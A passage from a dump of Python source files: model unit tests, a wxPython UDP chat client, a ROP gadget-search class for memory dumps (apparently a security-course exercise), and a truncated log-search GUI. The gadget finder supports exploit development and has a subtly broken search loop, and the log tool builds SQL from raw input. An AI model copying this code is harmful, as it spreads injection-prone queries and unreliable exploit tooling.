upload_in_memory.write(FILE_CONTENT.encode())\n\n await upload_in_memory.seek(0)\n assert upload_in_memory.file.tell() == 0\n\n file_meta = await File.create_from_uploaded(upload_in_memory)\n assert upload_in_memory.file.tell() > 0, \"modifies current position is at the end\"\n\n\ndef test_convert_between_file_models():\n\n storage_file_meta = StorageFileMetaData(\n **StorageFileMetaData.Config.schema_extra[\"examples\"][1]\n )\n storage_file_meta.file_id = f\"api/{uuid4()}/extensionless\"\n 
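# to_file_api_model parses storage ids of the form \"api/<uuid>/<filename>\":\n    # the filename, content_type and checksum assertions below rely on that\n    # layout, and the two pytest.raises blocks cover malformed ids.\n    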
apiserver_file_meta = to_file_api_model(storage_file_meta)\n\n assert apiserver_file_meta.id\n assert apiserver_file_meta.filename == \"extensionless\"\n assert apiserver_file_meta.content_type == \"application/octet-stream\" # default\n assert apiserver_file_meta.checksum == storage_file_meta.entity_tag\n\n with pytest.raises(ValueError):\n storage_file_meta.file_id = f\"{uuid4()}/{uuid4()}/foo.txt\"\n to_file_api_model(storage_file_meta)\n\n with pytest.raises(ValidationError):\n storage_file_meta.file_id = \"api/NOTUUID/foo.txt\"\n to_file_api_model(storage_file_meta)\n\n\n@pytest.mark.parametrize(\"model_cls\", (File,))\ndef test_file_model_examples(model_cls, model_cls_examples):\n for name, example in model_cls_examples.items():\n print(name, \":\", pformat(example))\n\n model_instance = model_cls(**example)\n\n assert model_instance, f\"Failed with {name}\"\n print(name, \":\", model_instance)\n\n assert model_instance.content_type is not None\n","sub_path":"services/api-server/tests/unit/test_models_schemas_files.py","file_name":"test_models_schemas_files.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"514317468","text":"import wx, socket, threading,json,time\n\nclass ChatFrame(wx.Frame):\n def __init__(self):\n default_size = (600,600)\n wx.Frame.__init__(self,None,-1, '聊天室', size=default_size)\n self.SetMaxSize(default_size) #与下一行的作用是固定大小\n self.SetMinSize(default_size)\n self.panel = wx.Panel(self,-1)\n self.panel.SetFocus()\n self.sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n self.server_addr = ('123.207.170.247',8000)\n #self.server_addr = ('127.0.0.1',8000)\n dlg = wx.TextEntryDialog(None,'请设置昵称:','昵称','')\n if dlg.ShowModal() == wx.ID_OK:\n nickname = dlg.GetValue()\n else:\n nickname = 'user%s'%(int(time.time()))\n dlg.Destroy()\n self.nickname = nickname\n self.cur_members = []\n self.initUI()\n self.updateUI()\n self.Show()\n\n def Destroy(self):\n data = dict(action='Quit',userid=self.userid)\n self.send(data)\n return super().Destroy()\n\n def initUI(self):\n self.roomlistctrl = wx.ListBox(self.panel,-1,choices=['未连接'],size = (100,500))\n self.createroombutton = wx.Button(self.panel,0,'创建房间',size=(100,100))\n self.sessionareactrl = wx.TextCtrl(self.panel,-1,style=wx.TE_MULTILINE | wx.TE_READONLY,size=(400,400))\n self.memberctrl = wx.ListBox(self.panel,-1,choices=[],size = (100,400))\n self.inputctrl = wx.TextCtrl(self.panel,-1,style=wx.TE_MULTILINE,size=(400,200))\n self.sendbutton = wx.Button(self.panel,1,'发送',size=(100,200))\n self.inputctrl.SetFocus()\n self.sessionareactrl.SetEditable(False)\n self.sessionareactrl.SetCanFocus(False)\n self.roomlistctrl.Bind(wx.EVT_LISTBOX_DCLICK, self.OnJoinRoom)\n self.createroombutton.Bind(wx.EVT_BUTTON, self.OnCreateRoom)\n self.sendbutton.Bind(wx.EVT_BUTTON, self.OnSend)\n sizer1 = wx.BoxSizer(orient = wx.VERTICAL)\n sizer1.Add(self.roomlistctrl)\n sizer1.Add(self.createroombutton)\n sizer2 = wx.BoxSizer()\n sizer2.Add(self.sessionareactrl)\n sizer2.Add(self.memberctrl)\n sizer3 = wx.BoxSizer()\n sizer3.Add(self.inputctrl)\n sizer3.Add(self.sendbutton)\n sizer4 = wx.BoxSizer(orient = wx.VERTICAL)\n sizer4.Add(sizer2)\n sizer4.Add(sizer3)\n sizer = wx.BoxSizer()\n sizer.Add(sizer1)\n sizer.Add(sizer4)\n self.panel.SetSizer(sizer)\n\n def updateuithd(self):\n self.connect()\n while True:\n data=self.sock.recvfrom(102400)\n data = str(data[0], 'utf-8')\n data = json.loads(data)\n print(data)\n retcode = 
data['retcode']\n if retcode==0:\n wx.CallAfter(self.sessionareactrl.AppendText,data['message']+'\\n')\n if 'userid' in data:\n self.userid = data['userid']\n if 'roomlist' in data:\n roomdict = data['roomlist']\n self.roomlist = [(k,roomdict[k]) for k in roomdict]\n roomchoice = [x[1] for x in self.roomlist]\n wx.CallAfter(self.roomlistctrl.Set,roomchoice)\n if 'roomid' in data:\n self.roomid = data['roomid']\n if 'members' in data:\n self.cur_members =[(k, data['members'][k]) for k in data['members']]\n memberschoice = [x[1] for x in self.cur_members]\n wx.CallAfter(self.memberctrl.Set,memberschoice)\n elif retcode==1:\n msg = '[%(_from)s] : %(message)s\\n'%data\n wx.CallAfter(self.sessionareactrl.AppendText,msg)\n elif retcode==2:\n action = data['action']\n if action =='AddRoom':\n if (data['roomid'],data['roomname']) in self.roomlist:\n continue\n self.roomlist.insert(0,(data['roomid'],data['roomname']))\n wx.CallAfter(self.roomlistctrl.InsertItems,[data['roomname']], 0)\n elif action == 'JoinRoom':\n if (data['userid'],data['nickname']) in self.cur_members:\n continue\n self.cur_members.insert(0,(data['userid'],data['nickname']))\n wx.CallAfter(self.memberctrl.InsertItems,[data['nickname']], 0)\n wx.CallAfter(self.sessionareactrl.AppendText,'[系统消息] : [%(nickname)s]进入房间了!\\n'%data)\n elif action == 'ExitRoom':\n userid = data['userid']\n nickname = data['nickname']\n if (userid,nickname) not in self.cur_members:\n continue\n index = self.cur_members.index((userid,nickname))\n self.cur_members.pop(index)\n wx.CallAfter(self.memberctrl.Delete, index)\n elif action == 'DelRoom':\n roomid = data['roomid']\n roomname = data['roomname']\n if (roomid,roomname) not in self.roomlist:\n continue\n index = self.roomlist.index((roomid,roomname))\n self.roomlist.pop(index)\n wx.CallAfter(self.roomlistctrl.Delete,index)\n wx.CallAfter(self.sessionareactrl.AppendText, '[系统消息] : 房间[%s]被系统删除了!\\n'%roomname)\n elif retcode==-1:\n print(data['message'])\n\n def updateUI(self):\n thd = threading.Thread(target= self.updateuithd)\n thd.setDaemon(True)\n thd.start()\n\n def send(self,data):\n data = bytes(json.dumps(data),'utf-8')\n self.sock.sendto(data,self.server_addr)\n\n def connect(self):\n data = dict(action='Connection',nickname=self.nickname)\n self.send(data)\n\n def OnJoinRoom(self,evt):\n index = evt.Selection\n roomid = self.roomlist[index][0]\n data = dict(action='JoinRoom',userid = self.userid,roomid=roomid)\n self.send(data)\n\n def OnCreateRoom(self,evt):\n dlg = wx.TextEntryDialog(None,'房间名:','房间名','')\n if dlg.ShowModal() == wx.ID_OK:\n roomname = dlg.GetValue()\n else:\n dlg.Destroy()\n return\n dlg.Destroy()\n data = dict(action='CreateRoom',userid = self.userid,roomname=roomname)\n self.send(data)\n\n def OnSend(self,evt):\n text = self.inputctrl.GetValue()\n data = dict(action='Chat', userid = self.userid,message=text)\n self.send(data)\n self.inputctrl.SetValue('')\n\nif __name__=='__main__':\n app = wx.App()\n frame = ChatFrame()\n app.MainLoop()","sub_path":"xuegod/ryn大神/chatingroomclient.py","file_name":"chatingroomclient.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"127382640","text":"import assemble\nimport string, mmap, itertools\n\nGENERAL_REGISTERS = [\n 'eax', 'ebx', 'ecx', 'edx', 'esi', 'edi'\n]\n\n\nALL_REGISTERS = GENERAL_REGISTERS + [\n 'esp', 'eip', 'ebp'\n]\n\n\nclass GadgetSearch(object):\n def __init__(self, dump_path, start_addr):\n \"\"\"\n Construct the 
GadgetSearch object.\n\n Input:\n dump_path: The path to the memory dump file created with GDB.\n start_addr: The starting memory address of this dump.\n \"\"\"\n self.path = dump_path\n self.sa = start_addr\n\n def get_format_count(self, gadget_format):\n \"\"\"\n Get how many different register placeholders are in the pattern.\n \n Examples:\n self.get_format_count('POP ebx')\n => 0\n self.get_format_count('POP {0}')\n => 1\n self.get_format_count('XOR {0}, {0}; ADD {0}, {1}')\n => 2\n \"\"\"\n # Hint: Use the string.Formatter().parse method:\n # import string\n # print string.Formatter().parse(gadget_format)\n found = []\n for _, field_name, _, _ in string.Formatter().parse(gadget_format):\n if field_name is not None and field_name not in found:\n found.append(field_name)\n return len(found)\n\n def get_register_combos(self, nregs, registers):\n \"\"\"\n Return all the combinations of `registers` with `nregs` registers in\n each combination. Duplicates ARE allowed!\n\n Example:\n self.get_register_combos(2, ('eax', 'ebx'))\n => [['eax', 'eax'],\n ['eax', 'ebx'],\n ['ebx', 'eax'],\n ['ebx', 'ebx']]\n \"\"\"\n return list(itertools.product(registers, repeat = nregs))\n\n def format_all_gadgets(self, gadget_format, registers):\n \"\"\"\n Format all the possible gadgets for this format with the given\n registers.\n\n Example:\n self.format_all_gadgets(\"POP {0}; ADD {0}, {1}\", ('eax', 'ecx'))\n => ['POP eax; ADD eax, eax',\n 'POP eax; ADD eax, ecx',\n 'POP ecx; ADD ecx, eax',\n 'POP ecx; ADD ecx, ecx']\n \"\"\"\n # Hints:\n # 1. Use the format function:\n # 'Hi {0}! I am {1}, you are {0}'.format('Luke', 'Vader')\n # => 'Hi Luke! I am Vader, you are Luke'\n # 2. You can use an array instead of specifying each argument. Use the\n # internet, the force is strong with StackOverflow.\n nregs = self.get_format_count(gadget_format)\n if nregs == 0:\n return [gadget_format]\n combinations = self.get_register_combos(nregs, registers)\n gadget_string = [gadget_format]*len(combinations)\n i = 0\n for combo in combinations:\n for regs in zip(*[iter(combo)]*nregs):\n gadget_string[i] = gadget_string[i].format(*regs)\n i += 1\n return gadget_string\n\n def find_all(self, gadget):\n \"\"\"\n Return all the addresses of the gadget inside the memory dump.\n\n Example:\n self.find_all('POP eax')\n => < all ABSOLUTE addresses in memory of 'POP eax; RET' >\n \"\"\"\n # Notes:\n # 1. Addresses are ABSOLUTE (for example, 0x08403214), NOT RELATIVE to the\n # beginning of the file (for example, 12).\n # 2. Don't forget to add the 'RET'\n addresses = []\n offset = 0\n gadget_opcodes = assemble.assemble_data(gadget+'; RET')\n with open(self.path, \"rw+b\") as lib_c:\n #string = read(lib_c)\n #offset = string.find(gadget_opcodes, offset)\n memmap = mmap.mmap(lib_c.fileno(),0)\n offset = memmap.find(gadget_opcodes, offset)\n while(offset != -1):\n addresses.append(self.sa + offset)\n offset = memmap.find(gadget_opcodes, offset+1)\n yield self.sa + offset\n\n def find(self, gadget, condition=None):\n \"\"\"\n Return the first result of find_all. 
If condition is specified, only\n consider addresses that meet the condition.\n \"\"\"\n condition = condition or (lambda x: True)\n try:\n return next(addr for addr in self.find_all(gadget) if condition(addr))\n except StopIteration:\n raise ValueError(\"Couldn't find matching address for \" + gadget)\n\n def find_all_formats(self, gadget_format, registers=GENERAL_REGISTERS):\n \"\"\"\n Similar to find_all - but return all the addresses of all\n possible gadgets that can be created with this format and registers.\n Every elemnt in the result will be a tuple of the gadget string and\n the address in which it appears.\n\n Example:\n self.find_all_formats('POP {0}; POP {1}')\n => [('POP eax; POP ebx', address1),\n ('POP ecx; POP esi', address2),\n ...]\n \"\"\" \n for formatted_gadget in self.format_all_gadgets(gadget_format, registers):\n for address in self.find_all(formatted_gadget):\n yield [formatted_gadget, address]\n\n def find_format(self, gadget_format, registers=GENERAL_REGISTERS, condition=None):\n \"\"\"\n Return the first result of find_all_formats. If condition is specified,\n only consider addresses that meet the condition.\n \"\"\"\n condition = condition or (lambda x: True)\n try:\n return next(\n addr for addr in self.find_all_formats(gadget_format, registers)\n if condition(addr))\n except StopIteration:\n raise ValueError(\n \"Couldn't find matching address for \" + gadget_format)","sub_path":"5/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"589087128","text":"import os\nimport re\nimport wx\nimport random\nimport wx.html2 as webview\nimport mysql.connector as mariadb\nimport sshtunnel\nfrom ObjectListView import ObjectListView, ColumnDefn\nfrom datetime import datetime\nimport paramiko\nimport tempfile\nimport zipfile\nimport shutil\nimport multiprocessing\nimport sqlite3\nfrom config import *\nfrom log_processing import *\nimport threading\n\ndhi_message = []\n\nclass Almanah(object):\n\n # ----------------------------------------------------------------------\n def __init__(self, date, external_id, stan, rrn, card_number, filename, resp_code, direction):\n \"\"\"Constructor\"\"\"\n self.date = date\n self.external_id = external_id\n self.stan = stan\n self.rrn = rrn\n self.card_number = card_number\n self.filename = filename\n self.resp_code = resp_code\n self.direction = direction\n\n\n########################################################################\nclass logPanel(wx.Panel):\n \"\"\"\"\"\"\n\n # ----------------------------------------------------------------------\n def __init__(self, parent):\n \"\"\"Constructor\"\"\"\n wx.Panel.__init__(self, parent, style=wx.NO_FULL_REPAINT_ON_RESIZE)\n self.data = []\n\n self.comboCtrl = wx.ComboBox(self, -1, size=(60, -1), choices=['PROD', 'TEST'], style=wx.CB_READONLY)\n self.comboCtrl.SetValue('PROD')\n\n ldst = wx.StaticText(self, label=\"Start Date\")\n lded = wx.StaticText(self, label=\"End Date\")\n limid = wx.StaticText(self, label=\"Request ID\")\n lrrn = wx.StaticText(self, label=\"RRN\")\n lstan = wx.StaticText(self, label=\"STAN\")\n lcard = wx.StaticText(self, label=\"CARD\")\n self.card = wx.TextCtrl(self)\n self.card.SetMaxLength(20)\n self.timid = wx.TextCtrl(self)\n self.timid.SetMaxLength(16)\n self.tstan = wx.TextCtrl(self)\n self.tstan.SetMaxLength(6)\n self.trrn = wx.TextCtrl(self, )\n self.trrn.SetMaxLength(12)\n # self.card.AppendText('5469550038327711')\n urlBtn = 
wx.Button(self, label=\"Get Transactions\")\n urlBtn.Bind(wx.EVT_BUTTON, self.get_data)\n\n clnBtn = wx.Button(self, label=\"Clean Cache\")\n clnBtn.Bind(wx.EVT_BUTTON, self.clean_cache)\n\n self.dst = wx.adv.DatePickerCtrl(self, size=(120, -1),\n style=wx.adv.DP_DROPDOWN\n | wx.adv.DP_SHOWCENTURY\n | wx.adv.DP_ALLOWNONE)\n self.ded = wx.adv.DatePickerCtrl(self, size=(120, -1),\n style=wx.adv.DP_DROPDOWN\n | wx.adv.DP_SHOWCENTURY\n | wx.adv.DP_ALLOWNONE)\n\n self.almOlv = ObjectListView(self,\n style=wx.LC_REPORT | wx.SUNKEN_BORDER)\n self.almOlv.SetEmptyListMsg(\"No data\")\n self.almOlv.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_select)\n self.almOlv.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.on_right_click)\n self.fitcpTxt = webview.WebView.New(self)\n self.frntnTxt = webview.WebView.New(self)\n\n self.inboundTxt = webview.WebView.New(self)\n self.outboundTxt = webview.WebView.New(self)\n\n # add sizers\n rowSizer = wx.BoxSizer(wx.HORIZONTAL)\n rowSizer.Add(clnBtn, 0, wx.ALL, 5)\n rowSizer.Add(self.comboCtrl, 0, wx.ALL, 5)\n rowSizer.Add(ldst, 0, wx.ALL, 5)\n rowSizer.Add(self.dst, 0, wx.ALL, 5)\n rowSizer.Add(lded, 0, wx.ALL, 5)\n rowSizer.Add(self.ded, 0, wx.ALL, 5)\n rowSizer.Add(limid, 0, wx.ALL, 5)\n rowSizer.Add(self.timid, 1, wx.EXPAND | wx.ALL, 5)\n rowSizer.Add(lrrn, 0, wx.ALL, 5)\n rowSizer.Add(self.trrn, 1, wx.EXPAND | wx.ALL, 5)\n rowSizer.Add(lstan, 0, wx.ALL, 5)\n rowSizer.Add(self.tstan, 1, wx.EXPAND | wx.ALL, 5)\n rowSizer.Add(lcard, 0, wx.ALL, 5)\n rowSizer.Add(self.card, 1, wx.EXPAND | wx.ALL, 5)\n rowSizer.Add(urlBtn, 0, wx.ALL, 5)\n\n vSizer = wx.BoxSizer(wx.VERTICAL)\n vSizer.Add(self.almOlv, 5, wx.EXPAND | wx.ALL, 5)\n vSizer.Add(self.fitcpTxt, 5, wx.EXPAND | wx.ALL, 5)\n vSizer.Add(self.frntnTxt, 5, wx.EXPAND | wx.ALL, 5)\n\n dispSizer = wx.BoxSizer(wx.HORIZONTAL)\n dispSizer.Add(vSizer, 1, wx.EXPAND | wx.ALL, 5)\n dispSizer.Add(self.inboundTxt, 2, wx.EXPAND | wx.ALL, 5)\n dispSizer.Add(self.outboundTxt, 2, wx.EXPAND | wx.ALL, 5)\n\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n mainSizer.Add(rowSizer, 0, wx.EXPAND)\n mainSizer.Add(dispSizer, 1, wx.EXPAND)\n self.SetSizer(mainSizer)\n\n self.update_display()\n\n # ----------------------------------------------------------------------\n\n def save_dialog(self):\n\n dlg = wx.FileDialog(self, \"Save DHI as...\", os.getcwd(), \"\", \"Text document (*.txt)|*.txt\",\n wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)\n result = dlg.ShowModal()\n inFile = dlg.GetPath()\n dlg.Destroy()\n\n if result == wx.ID_OK: # Save button was pressed\n return inFile\n # save(window, inFile)\n #return True\n elif result == wx.ID_CANCEL: # Either the cancel button was pressed or the window was closed\n return False\n\n def clean_cache(self, event):\n \"\"\"\n Clean cache files if exists\n \"\"\"\n env = self.comboCtrl.GetValue()\n env = config[env]\n if os.path.exists(env['database'] + \".sqlite\"):\n os.remove(env['database'] + \".sqlite\")\n wx.MessageBox(message=\"Cache file {} has been deleted\".format(env['database'] + \".sqlite\"),\n caption='Cache was cleaned',\n style=wx.OK | wx.ICON_INFORMATION)\n\n def put_data_from_dict(self, message_dict, file=None):\n\n direction = 0\n if message_dict.get('inbound'):\n iso_dict = 'inbound'\n direction = 0\n inbound_message = message_dict.get(iso_dict)\n if file:\n self.data.append(\n Almanah(inbound_message.get('date', \"\"), inbound_message.get('externalid', \"\"),\n inbound_message.get('011', \"\"),\n inbound_message.get('037', \"\"), inbound_message.get('002', \"\"), file, inbound_message.get('039', \"\"),\n 
direction))\n            inbound_html = \"<html><body><b>Принято из DHI</b><br><br>{}</body></html>\".format('<br>'.join(\n                '{}: {}'.format(key, val) for key, val in sorted(inbound_message.items()) if\n                val))\n            self.inboundTxt.SetPage(inbound_html, \"\")\n        if message_dict.get('outbound'):\n            iso_dict = 'outbound'\n            direction = 1\n            outbound_message = message_dict.get(iso_dict)\n            if file:\n                self.data.append(\n                    Almanah(outbound_message.get('date', \"\"), outbound_message.get('externalid', \"\"),\n                            outbound_message.get('011', \"\"),\n                            outbound_message.get('037', \"\"), outbound_message.get('002', \"\"),\n                            file, outbound_message.get('039', \"\"),\n                            direction))\n\n            outbound_html = \"<html><body><b>Отправлено в DHI</b><br><br>{}</body></html>\".format('<br>'.join(\n                '{}: {}'.format(key, val) for key, val in sorted(outbound_message.items())\n                if val))\n            self.outboundTxt.SetPage(outbound_html, \"\")\n\n        if message_dict.get('frntn'):\n            frntn_message = message_dict.get('frntn')\n            frntn_html = \"<html><body><b>Отправлено в МПС</b><br><br>{}</body></html>\".format('<br>'.join(\n                '{}: {}'.format(key, val) for key, val in sorted(frntn_message.items()) if\n                val))\n            self.fitcpTxt.SetPage(frntn_html, \"\")\n        if message_dict.get('fitcp'):\n            fitcp_message = message_dict.get('fitcp')\n            fitcp_html = \"<html><body><b>Принято из МПС</b><br><br>{}</body></html>\".format('<br>'.join(\n                '{}: {}'.format(key, val) for key, val in sorted(fitcp_message.items()) if\n                val))\n            self.frntnTxt.SetPage(fitcp_html, \"\")\n    busyDlg = None\n\n    def get_data(self, event):\n        \"\"\"\n        Get SQL data and add it to display\n        \"\"\"\n        self.data = []\n\n        pcard = self.card.GetValue()\n        pimid = self.timid.GetValue()\n        prrn = self.trrn.GetValue()\n        pstan = self.tstan.GetValue()\n        ptst = self.dst.GetValue().IsValid()\n        pted = self.ded.GetValue().IsValid()\n        env = self.comboCtrl.GetValue()\n\n        env = config[env]\n\n        datelist = []\n        if ptst:\n            datelist.append(datetime.strptime(\n                \"{}-{}-{}\".format(self.dst.GetValue().GetYear(), self.dst.GetValue().GetMonth() + 1,\n                                  self.dst.GetValue().GetDay()), \"%Y-%m-%d\"))\n        if pted:\n            datelist.append(datetime.strptime(\n                \"{}-{}-{}\".format(self.ded.GetValue().GetYear(), self.ded.GetValue().GetMonth() + 1,\n                                  self.ded.GetValue().GetDay()), \"%Y-%m-%d\"))\n        zipgrep_cause = []\n        if pcard:\n            zipgrep_cause.append(\"[i002]*{}\".format(pcard))\n        if pimid:\n            zipgrep_cause.append(\"External ID.+{}\".format(pimid))\n        if prrn:\n            zipgrep_cause.append(\"[i037]*{}\".format(prrn))\n        if pstan:\n            zipgrep_cause.append(\"[i011]*{}'\".format(pstan))\n        fstring = \"|\".join(map(str, zipgrep_cause))\n\n\n        where_cause = []\n        if pcard:\n            where_cause.append(\"card_number like '{}%'\".format(pcard))\n        if pimid:\n            where_cause.append(\"external_id like '{}%'\".format(pimid))\n        if prrn:\n            where_cause.append(\"rrn like '{}%'\".format(prrn))\n        if pstan:\n            where_cause.append(\"stan like '{}%'\".format(pstan))\n        if ptst or pted:\n            if ptst and pted:\n                where_cause.append(\"date between '{}-{:02d}-{:02d} 00:00:00' and '{}-{:02d}-{:02d} 23:59:59'\".format(\n                    self.dst.GetValue().GetYear(), self.dst.GetValue().GetMonth() + 1, self.dst.GetValue().GetDay(),\n                    self.ded.GetValue().GetYear(), self.ded.GetValue().GetMonth() + 1, self.ded.GetValue().GetDay()))\n            elif ptst:\n                where_cause.append(\"date between '{}-{:02d}-{:02d} 00:00:00' and '{}-{:02d}-{:02d} 23:59:59'\".format(\n                    self.dst.GetValue().GetYear(), self.dst.GetValue().GetMonth() + 1, self.dst.GetValue().GetDay(),\n                    self.dst.GetValue().GetYear(), self.dst.GetValue().GetMonth() + 1, self.dst.GetValue().GetDay()))\n            elif pted:\n                where_cause.append(\"date between '{}-{:02d}-{:02d} 00:00:00' and '{}-{:02d}-{:02d} 23:59:59'\".format(\n                    self.ded.GetValue().GetYear(), self.ded.GetValue().GetMonth() + 1, self.ded.GetValue().GetDay(),\n                    self.ded.GetValue().GetYear(), self.ded.GetValue().GetMonth() + 1, self.ded.GetValue().GetDay()))\n\n        if where_cause:\n            msg = \"Processing sql data...\"\n            busyDlg = wx.BusyInfo(msg)\n            try:\n                # _almanah_select = \"\"\"select ST.date, ST.external_id, ST.stan, ST.rrn, ST.card_number, ST.filename, ST.resp_code, ST.direction from small_table as ST where ST.external_id=(select external_id from small_table where {})\"\"\".format(\" and \".join(map(str, where_cause)))\n                _almanah_select = \"\"\"select ST.date, ST.external_id, ST.stan, ST.rrn, ST.card_number, ST.filename, ST.resp_code, ST.direction from small_table as ST where {} LIMIT 100\"\"\".format(\n                    \" and \".join(map(str, where_cause)))\n                _, sql_data = search_sqlite(env['database'] + \".sqlite\", _almanah_select)\n                if not sql_data:\n                    try:\n                        sql_data = get_from_mysql(env['hostname'], env['username'], env['password'],\n                                                  env['sql_username'],\n                                                  env['sql_password'], env['database'],\n                                                  \" and \".join(map(str, where_cause)))\n                        if sql_data:\n                            write_almanah_sqlite(env['database'] + \".sqlite\", sql_data)\n                    except Exception as exc:\n                        
wx.MessageBox(message='{}'.format(str(exc)),\n caption='Error retriving from cache',\n style=wx.OK | wx.ICON_ERROR)\n\n if sql_data:\n for sql_message in sql_data:\n self.data.append(\n Almanah(sql_message[0], sql_message[1], sql_message[2], sql_message[3], sql_message[4],\n sql_message[5], sql_message[6], sql_message[7]))\n self.update_display()\n busyDlg = wx.BusyInfo(\"Processed file {}\".format(sql_message[5]))\n message_dict = server_cli_proccess(env, sql_message[5], fstring)\n if message_dict.get('inbound'):\n if message_dict.get('inbound').get('037'):\n s_rrn = message_dict.get('inbound').get('rrn')\n t_dict = server_cli_proccess(env, sql_message[5], s_rrn)\n message_dict.update(t_dict)\n elif message_dict.get('outbound'):\n if message_dict.get('outbound').get('037'):\n rrn = message_dict.get('outbound').get('037')\n t_dict = server_cli_proccess(env, sql_message[5], rrn)\n message_dict.update(t_dict)\n self.put_data_from_dict(message_dict)\n\n else:\n if ptst or pted:\n busyDlg = None\n dlg = wx.MessageDialog(None, \"Nothing found. Do you want to search on log archives?\",\n \"Long time action...\", wx.YES_NO | wx.ICON_QUESTION)\n dlg_result = dlg.ShowModal() == wx.ID_YES\n dlg.Destroy()\n if dlg_result:\n\n busyDlg = wx.BusyInfo(\"Searching in files on archive server\")\n files_to_append = list_files(datelist, env['hostname'], env['username'], env['password'],\n env['folder'], env['filemask'], env['parallel'], fstring)\n for file in files_to_append:\n busyDlg = wx.BusyInfo(\"Processed file {}\".format(file))\n message_dict = server_cli_proccess(env, file, fstring)\n if message_dict.get('inbound').get('037'):\n s_rrn = message_dict.get('inbound').get('rrn')\n t_dict = server_cli_proccess(env, file, s_rrn)\n message_dict.update(t_dict)\n self.put_data_from_dict(message_dict, file)\n\n\n \"\"\"\n server_file_process(env, file)\n\n _almanah_select = \"select ST.date, ST.external_id, ST.stan, ST.rrn, ST.card_number, ST.filename, ST.resp_code, ST.direction from small_table as ST where {}\".format(\n \" and \".join(map(str, where_cause)))\n _, sql_data = search_sqlite(env['database'] + \".sqlite\", _almanah_select)\n if sql_data:\n for sql_message in sql_data:\n self.data.append(\n Almanah(sql_message[0], sql_message[1], sql_message[2], sql_message[3],\n sql_message[4],\n sql_message[5], sql_message[6], sql_message[7]))\n \"\"\"\n\n except Exception as exc:\n wx.MessageBox(message=str(exc),\n caption='Error during fetching',\n style=wx.OK | wx.ICON_ERROR)\n else:\n wx.MessageBox(message=\"Please specify at least one parameter\",\n caption='Parameters not found',\n style=wx.OK | wx.ICON_ERROR)\n busyDlg = None\n self.update_display()\n\n # ----------------------------------------------------------------------\n def on_right_click(self, event):\n self.Bind(wx.EVT_CONTEXT_MENU, self.OnShowPopup)\n\n def OnShowPopup(self, event):\n self.popupmenu = wx.Menu()\n menuItem = wx.MenuItem(self.popupmenu, wx.NewId(), 'Create DHI Request')\n menuItem2 = wx.MenuItem(self.popupmenu, wx.NewId(), 'Load From File')\n self.popupmenu.Append(menuItem)\n self.popupmenu.Append(menuItem2)\n self.popupmenu.Bind(wx.EVT_MENU, self.Create_DHI, menuItem)\n self.popupmenu.Bind(wx.EVT_MENU, self.Load_File, menuItem2)\n pos = event.GetPosition()\n pos = self.ScreenToClient(pos)\n event.GetEventObject().SetFocus()\n self.PopupMenu(self.popupmenu, pos)\n\n def Create_DHI(self, event):\n global dhi_message\n if dhi_message:\n filename = self.save_dialog()\n create_request(filename, dhi_message)\n print(dhi_message)\n\n 
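# Load_File defers the download and parsing of the selected log file to a\n    # daemon thread (server_file_process below), keeping the wx UI responsive.\n    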
def Load_File(self, event):\n        global dhi_message\n        busyDlg = None\n        base_path = os.path.dirname(os.path.abspath(__file__))\n        obj = self.almOlv.GetSelectedObject()\n\n        env = self.comboCtrl.GetValue()\n        env = config[env]\n        thread = threading.Thread(target=server_file_process, args=(env, obj.filename))\n        thread.setDaemon(True)\n        thread.start()\n    # ----------------------------------------------------------------------\n    def on_select(self, event):\n        \"\"\"\n        Load the summary in the text control\n        \"\"\"\n        global dhi_message\n        busyDlg = None\n        base_path = os.path.dirname(os.path.abspath(__file__))\n        obj = self.almOlv.GetSelectedObject()\n\n        env = self.comboCtrl.GetValue()\n        env = config[env]\n\n        try:\n            _, tsql_out_data = search_sqlite(env['database'] + \".sqlite\",\n                                             \"\"\"SELECT * from {} WHERE Additional_Data_External_ID='{}'\"\"\".format(\n                                                 'outbound_messages', obj.external_id))\n            _, tsql_in_data = search_sqlite(env['database'] + \".sqlite\",\n                                            \"\"\"SELECT * from {} WHERE Additional_Data_External_ID='{}'\"\"\".format(\n                                                'inbound_messages', obj.external_id))\n        except Exception as exc:\n            busyDlg = wx.BusyInfo(\"Not found in Cache External_ID {}\".format(obj.external_id))\n\n        if not (tsql_out_data or tsql_in_data):\n            message_dict = server_cli_proccess(env, obj.filename, obj.rrn)\n            if message_dict.get('inbound').get('037'):\n                s_rrn = message_dict.get('inbound').get('rrn')\n                t_dict = server_cli_proccess(env, obj.filename, s_rrn)\n                message_dict.update(t_dict)\n            self.put_data_from_dict(message_dict)\n\n        else:\n            try:\n                sql_out_names, sql_out_data = search_sqlite(env['database'] + \".sqlite\",\n                                                            \"\"\"SELECT * from {} WHERE Additional_Data_External_ID='{}'\"\"\".format(\n                                                                'outbound_messages', obj.external_id))\n                sql_in_names, sql_in_data = search_sqlite(env['database'] + \".sqlite\",\n                                                          \"\"\"SELECT * from {} WHERE Additional_Data_External_ID='{}'\"\"\".format(\n                                                              'inbound_messages', obj.external_id))\n                if sql_out_data:\n                    outbound_message = dict(zip(sql_out_names, sql_out_data[0]))\n                    dhi_message = outbound_message\n                    outbound_html = \"<html><body><b>Отправлено в DHI</b><br><br>{}</body></html>\".format('<br>'.join('{}: {}'.format(key, val) for key, val in sorted(outbound_message.items()) if val))\n                    self.outboundTxt.SetPage(outbound_html, \"\")\n                if sql_in_data:\n                    inbound_message = dict(zip(sql_in_names, sql_in_data[0]))\n                    inbound_html = \"<html><body><b>Принято из DHI</b><br><br>{}</body></html>\".format('<br>'.join('{}: {}'.format(key, val) for key, val in sorted(inbound_message.items()) if val))\n                    self.inboundTxt.SetPage(inbound_html, \"\")\n                    mes_rrn = inbound_message.get('Response_ReferenceNumber')\n                    if mes_rrn:\n                        sql_fitcp_names, sql_fitcp_data = search_sqlite(env['database'] + \".sqlite\",\n                                                                        \"\"\"SELECT * from {} WHERE `037`='{}'\"\"\".format(\n                                                                            'tcpip_messages', mes_rrn))\n                        if sql_fitcp_data:\n                            